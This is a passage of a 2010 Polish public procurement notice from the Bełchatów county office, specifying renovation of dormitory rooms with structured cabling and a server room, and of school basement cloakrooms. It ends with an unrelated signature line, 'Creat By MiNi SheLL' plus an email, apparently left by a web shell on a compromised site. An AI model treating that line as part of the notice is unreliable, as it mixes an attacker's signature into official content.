<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.e-bip.pl/Bełchatow Powiat Ziemski/zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Bełchatowie ul. Pabianicka 17/19, Wydział Zamowień Publicznych i Inwestycji.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.08.2010 godzina 10:00, miejsce: Ofertę należy zlozyć w siedzibie zamawiajacego : Starostwo Powiatowe w Bełchatowie ul. Pabianicka 17/19 , Sekretariat III piętro ,nie później niż do dnia 10.08.2010 r do godz. 10.00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1. Przebudowa pomieszczeń wraz z wykonaniem okablowania strukturalnego  z dedykowaną instalacją elektryczną dla Zespołu          ds. orzekania o niepełnosprawności w budynku Bursy Szkolnej                 w Bełchatowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1. Przebudowa pomieszczeń wraz z wykonaniem okablowania strukturalnego         z dedykowaną instalacją elektryczną dla Zespołu ds. orzekania o niepełnosprawności                     w budynku Bursy Szkolnej w Bełchatowie

3.1.1. Branża budowlana:

Przedmiotem zamówienia jest zmiana sposobu użytkowania, polegająca na adaptacji pomieszczeń budynku Bursy szkolnej na Zakład ds. orzekania o niepełnosprawności. Istniejące pomieszczenia zostaną przystosowane dla potrzeb osób niepełnosprawnych. Zaprojektowano następujące pomieszczenia: pomieszczenie 23 zaprojektowano na pomieszczenie serwerowni, pomieszczenie 8 przedzielono ściankami gipsowo-kartonowymi, tworząc nowe pomieszczenie 8a. 
Roboty rozbiórkowe i demontażowe:
Roboty polegające na rozkuciu istniejących otworów drzwiowych i dopasowaniu ich na potrzeby zainstalowania drzwi antywłamaniowych typu C. Przebudowa pokoju 23 na pomieszczenie serwerowni obejmuje roboty polegające na usunięciu płytek ceramicznych ze ścian oraz terakoty         z podłogi. Dodatkowo należy zdemontować umywalkę, sedes. W pomieszczeniu 8a należy zdemontować płytki lastryko. W obu pomieszczeniach należy usunąć istniejący podkład betonowy znajdujący się na płycie stropowej. 
Roboty montażowe: 
Zaprojektowano przegrodę, dzielącą pomieszczenie 8, z płyt gipsowo-kartonowych na stelażu stalowym o grubości całkowitej 100mm. Grubość płyt przyjęto 12,5mm. Pomiędzy płytami umieszczono płytę z wełny mineralnej grubości 8cm. W przegrodzie zamontowano 4 drzwi                   o szerokości skrzydła 80cm. Pozostałe drzwi należy wymienić na nowe drzwi antywłamaniowe typu C, o szerokości skrzydeł 90cm. Przyjęto ościeżnice stalowe wmurowane do ścian z cegły,              w przypadku płyt gipsowo-kartonowych przyjęto profile ościeżnicowe. Otwory drzwiowe są przystosowane do zamontowania systemowej ościeżnicy antywłamaniowej. We wszystkich pomieszczeniach należy wykonać wylewkę cementową grubości 30mm a na niej wylewkę samopoziomującą grubości 20mm. W pomieszczeniu 23 należy zamontować wykładzinę firmy Armstrong - DLW typ Strong 951 lub równoważną, w pomieszczeniu 8a przeznaczonym na brudownik oraz we wszystkich pozostałych pomieszczeniach objętych opracowaniem należy zamontować wykładzinę firmy Armstrong - Favorite Pur lub równoważną. Wykładziny należy zamontować zgodnie z zaleceniami producentów. 
Roboty okładzinowe: 
W pokoju 8 i 23 należy otynkować wszystkie powierzchnie ścian i sufit. Dodatkowo powierzchnie wokół drzwi antywłamaniowych otynkować zaprawą cementowo-wapienną. Wszystkie otynkowane powierzchnie należy pomalować farbą emulsyjną. 

3.1.2. Branża elektryczna:

Przedmiotem zamówienia  jest wykonanie instalacji elektrycznych w przebudowywanej części budynku. Zakres zamówienia obejmuje:
rozdzielnica TK,
instalacja gniazd wtyczkowych,
instalacja okablowania strukturalnego,
instalacja połączeń wyrównawczych,
ochrona od porażeń prądem elektrycznym.

Zasilanie budynku i bilans mocy:
Obecnie budynek posiada układ pomiarowy. Projektowana rozdzielnica TK będzie zasilana                    z istniejącej rozdzielnicy TO, która znajduje się w jednej obudowie z rozdzielnicą główną TG.                W rozdz. TG znajduje się główny wyłącznik przeciwpożarowy budynku. W celu zasilenia rozdzielnicy TK należy dobudować jedno pole w istniejącej obudowie - zamontować rozłącznik bezpiecznikowy z wkładką 25A. Z tego pola należy poprowadzić kabel YKYżo 5x6mm2 do tablicy TK. Bilans mocy: moc zainstalowana PS = 5,7 kW; współczynnik jednoczesności kj = 0,8; moc szczytowa Pmax = 4,5 kW; prąd obliczeniowy IO = 7 A;prąd zabezpieczenia w TO IB = 25A
Obecna moc przyłączeniowa budynku w pełni pokryje zapotrzebowanie mocy na obwody projektowane.

Instalacja gniazd wtykowych:
Obwody gniazd wtykowych wykonać przewodem typu YDYp lub YDY o przekroju 3x2,5 mm2 750V. Instalacje układać w listwach PCV. Należy przewidzieć rezerwę w listwach w głównych ciągach dla instalacji alarmowej, która będzie zamontowana na obiekcie w przyszłości.
W pomieszczeniach montować na wysokości 30 cm od posadzki w ramkach wielokrotnych, razem z gniazdami RJ45. Gniazda montować natynkowo, w kanałach. Gniazda należy montować                     w miejscach wskazanych na rzucie lub po uzgodnieniu z Inwestorem na etapie wykonawstwa.
Należy skrupulatnie przestrzegać kolorystycznego oznakowania żył przewodowych i kabli (również w obrębie rozdzielnicy). Przewód zerowy (N) musi posiadać izolację koloru jasnoniebieskiego,          a przewód ochronny (PE) -żółto-zielonego. W żadnym miejscu instalacji odbiorczej przewód zerowy (N) i przewód ochronny (PE) nie mogą być połączone. Wszystkie urządzenia i sprzęt elektryczny, których konstrukcja wykonana jest z metalu lub zawierają one elementy metalowe, na których w przypadku uszkodzenia może pojawić się napięcie, muszą być obowiązkowo przyłączone do przewodu ochronnego. Dla przewodów i kabli przeznaczonych do ułożenia należy stosować trasy pionowe i poziome. W myśl tego doprowadzenie przewodów do opraw oświetleniowych na stropie należy wykonać pod kątem prostym. Skośnie przeprowadzone kable, przewody i puste rury nie zostaną odebrane jako prawidłowo wykonane. Wszystkie przejścia przez ściany i stropy oddzieleń pożarowych (oddzielne strefy pożarowe) należy uszczelnić niepalną pianką o odporności ogniowej równej odporności tego oddzielenia. Wszystkie wykorzystywane urządzenia i materiały muszą posiadać fabryczne oznaczenia. Urządzenia i materiały będą w pełni zgodne z polskimi normami.
W miejscu wspólnego prowadzenia przewodów z instalacją słaboprądową należy zastosować separację w postaci przegrody koryta kablowego. Minimalna odległość między kablami informatycznymi i lampami fluoroscencyjnymi, neonowymi i próżniowo-łukowymi (lub innymi            o wysokim poziomie prądu rozładowania) powinna wynosić minimum 300 mm.Trasa instalacji powinna przebiegać bezkolizyjnie z innymi instalacjami i urządzeniami, trasa powinna być
przejrzysta, prosta i dostępna dla prawidłowej konserwacji oraz przyszłej rozbudowy. Kanały kablowe DLP 65x150 z przegrodą i dwoma pokrywami 65 posiadają minimum 30% rezerwy miejsca na ewentualną rozbudowę sieci.

Instalacja sieci strukturalnej:
System okablowania strukturalnego ma zapewnić warstwę fizyczną dla przesyłu wszystkich aplikacji zaprojektowanych dla okablowania klasy E (kategorii 6) według najnowszych standardów PN-EN 50173, ISO/IEC11801, ANSI/TIA/EIA 568-B.2. Dla zapewnienia elastyczności, system musi umożliwiać swobodną rozbudowę, oraz rekonfigurację. Wszystkie komponenty systemu okablowania muszą spełniać wymagania co najmniej kategorii 6 w celu uzyskania odpowiednio dużych marginesów bezpieczeństwa parametrów transmisyjnych. Projektowane okablowanie poziome obsługiwane jest przez następujący punkt dystrybucyjny GPD obsługujący łączność pomiędzy punktami końcowymi. Szafa 42U 1000x800 w pomieszczeniu nr 23, w której zbiegać się będą linie transmisyjne. Maksymalna długość kabla instalacyjnego (tzw. łącza stałego) nie może przekroczyć 90 metrów. Środowisko, w którym będzie instalowany osprzęt kablowy zostało sklasyfikowane jako M1I1C1E1 (łagodne) wg. specyfikacji środowiska instalacji okablowania (MICE) - zgodnie z PN-EN 50173-1:2009.

Budowa punktu logicznego:
Punkty logiczne PL dla systemu sieci strukturalnej oparte zostały na uniwersalnym ekranowanym gnieździe teleinformatycznym kategorii 6, montowanym w uchwycie do osprzętu 45mm. Zestaw instalacyjny powinien zawierać płytę czołową prostą z ramką montażową 45mm. W fazie projektowej (uruchomienia instalacji) należy skonfigurować gniazda końcowe tak, aby spełniały
obecne wymagania kategorii 6/klasy E. W każdym przypadku doprowadzając kabel do gniazda należy pozostawić odpowiedni zapas kabla instalacyjnego. Podczas montażu gniazda RJ45 należy bezwzględnie pamiętać o oznakowaniu gniazd zgodnym z oznaczeniem kabla oraz gniazdem               w panelu krosowym punktu dystrybucyjnego.

Instalacja oświetlenia:
Należy stosować oprawy wyposażone w źródła światła jarzeniowe. Przy doborze opraw oświetlenia wewnętrznego stosować normę PN-EN 12464-1..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.00.00-3, 45.45.30.00-7, 32.41.00.00-0, 32.42.00.00-3, 32.42.30.00-4, 45.31.43.20-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2.  Remont pomieszczeń piwnic - szatni w II Liceum Ogólnokształcącym                  w Bełchatowie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje:
1. Roboty rozbiórkowe:
demontaż istniejących boksów w szatni,
rozebranie posadzki lastrico,
2. Prace posadzkarskie:
po rozebraniu istniejącej posadzki lastrico, oczyszczenie i odkurzenie powierzchni,
ułożenie izolacji z emulsji typu Dysperbit w dwóch warstwach, następnie ułożenie folii izolacyjnej gr.0,2mm,
wykonanie posadzki cementowej gr.4cm zbrojonej siatką stalową z drutu śr.4mm i oczkach 15x15cm, wykonanie dylatacji zgodnie z dylatacjami w odsłoniętym podłożu po skuciu lastrica,
gruntowanie posadzek, ułożenie płytek podłogowych gresowych (kolor do uzgodnienia             z inwestorem), dylatacje wykonać z systemowych listew do płytek podłogowych,
ułożenie cokoliku o wys. 10cm.
3. Roboty wykończeniowe:
zeskrobanie i zmycie ścian i sufitów z wyługowaniem farby olejnej na lamperii,
przygotowanie podłoża i wykonanie 1-warstwowej gładzi gipsowej na ścianach i suficie,
sufit i ściany powyżej tynku mozaikowego należy pomalować farbą emulsyjną                          po uprzednim wykonaniu 1-warstwowej gładzi gipsowej,
wykonanie lamperii na wysokość 200 cm z tynku mozaikowego, żywicznego (kolor                  do uzgodnienia z Inwestorem)
przejścia poniżej 2,0m oznakować pasami czarno-żółtymi.
4. Zabudowa rur kanalizacyjnych i zaworów c.o.:
istniejące rury kanalizacyjne obudować płytą g-k wodoodporną gr.12,5mm (pionowo), od spodu natomiast wykonać zabudowę typu Amstrong, która umożliwi dostęp do rur,
istniejące zawory c.o. na filarach międzyokiennych obudować płytą g-k wodoodporną gr.12,5mm, obsadzić drzwiczki metalowe 50x50cm wyposażone w zamek.
5. Malowanie rur instalacji c.o.:
istniejące rury instalacji c.o. należy oczyścić i pomalować 2-krotnie farbą olejną.
6. Stolarka drzwiowa:
wykonać montaż drzwi 2-skrzydłowych z ościeżnicą metalową. Kolorystykę stolarki należy
dobrać w uzgodnieniu z Inwestorem.
7. Montaż nawiewników okiennych:
w istniejącej stolarce okiennej PCV zamontować nawiewniki higrosterowane typu AERECO EMM 707..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.45.30.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com